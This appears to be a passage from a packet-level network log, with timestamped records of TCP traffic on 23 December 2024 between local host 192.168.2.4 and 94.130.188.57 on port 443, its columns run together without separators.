                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146044970 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146097898 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146164894 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146190882 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146224976 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146253109 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146259069 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146306038 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146315098 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146338940 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146358013 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146370888 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146374941 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146399975 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146400928 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146428108 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146444082 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146459103 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146469116 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146519899 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146522045 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146553993 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146575928 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146588087 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146604061 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146610022 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146651030 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146670103 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146713018 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146744013 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146760941 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146806955 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146838903 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146863937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146899939 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146946907 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146975040 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147005081 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147106886 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147245884 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147290945 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147382975 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147492886 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147533894 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147566080 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147597075 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147661924 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147663116 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148283958 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148371935 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148536921 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148577929 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165575981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165735960 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165772915 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165832043 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165929079 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165997028 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166014910 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166043043 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166043997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166071892 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207351923 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207540989 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207591057 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241156101 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241223097 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241436958 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241472960 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241512060 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241547108 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241616964 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241681099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242474079 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242522955 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242691994 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242719889 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242774010 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242830992 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242854118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259008884 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259170055 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259289026 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259371996 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259413958 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259433985 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259465933 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259521961 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259547949 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259572983 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259627104 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259628057 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259675980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259701014 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259735107 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259752035 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260621071 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260643959 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260790110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260860920 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.261085033 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.261142969 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262403965 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262485981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262643099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262686968 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262739897 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262881041 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.263052940 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.263118029 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264075994 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264164925 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264349937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264405012 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264425993 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.265808105 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.265988111 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266068935 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266068935 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266088963 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266108990 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266119957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266141891 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266154051 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266431093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266535997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266590118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266613960 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266627073 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266675949 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267398119 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267494917 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267798901 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267831087 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267844915 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.267968893 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.268011093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.269968033 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270061970 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270289898 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270322084 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270334959 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270459890 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.270512104 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307095051 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307178974 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307357073 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307388067 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307445049 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307593107 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.307629108 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.351347923 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.378891945 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379053116 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379117012 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379146099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379206896 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379640102 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.379690886 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382309914 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382405996 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382555962 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382599115 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382618904 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382671118 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382740974 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.382792950 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386177063 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386301994 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386454105 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386495113 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386531115 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386548996 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386565924 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386620998 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386657953 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.386682987 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390074015 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390163898 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390325069 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390377045 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390531063 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.390571117 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393079042 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393171072 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393340111 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393387079 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393392086 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393424988 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393626928 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.393673897 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.435380936 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.435766935 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.467123985 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.471626997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.471700907 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.471757889 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.475250959 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.477248907 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.496918917 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.497047901 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.498810053 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.498876095 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.498924017 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.498944998 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.498996019 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.505284071 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.513694048 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.513958931 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514082909 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514163017 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514261007 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514656067 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514691114 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514730930 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514903069 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.514923096 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515036106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515064955 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515089989 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515121937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515122890 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515155077 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515182018 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515269995 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515302896 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515360117 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515377045 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515383959 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515412092 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515470982 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515675068 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515695095 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515736103 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515757084 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515799046 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515824080 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515825033 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515850067 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515850067 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515871048 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515917063 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515917063 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515924931 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515950918 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515952110 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515978098 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516019106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516031981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516063929 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516127110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516172886 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516211987 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516232014 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516350031 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516438961 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516506910 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516536951 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516542912 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516566992 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516567945 CET4434977994.130.188.57192.168.2.4
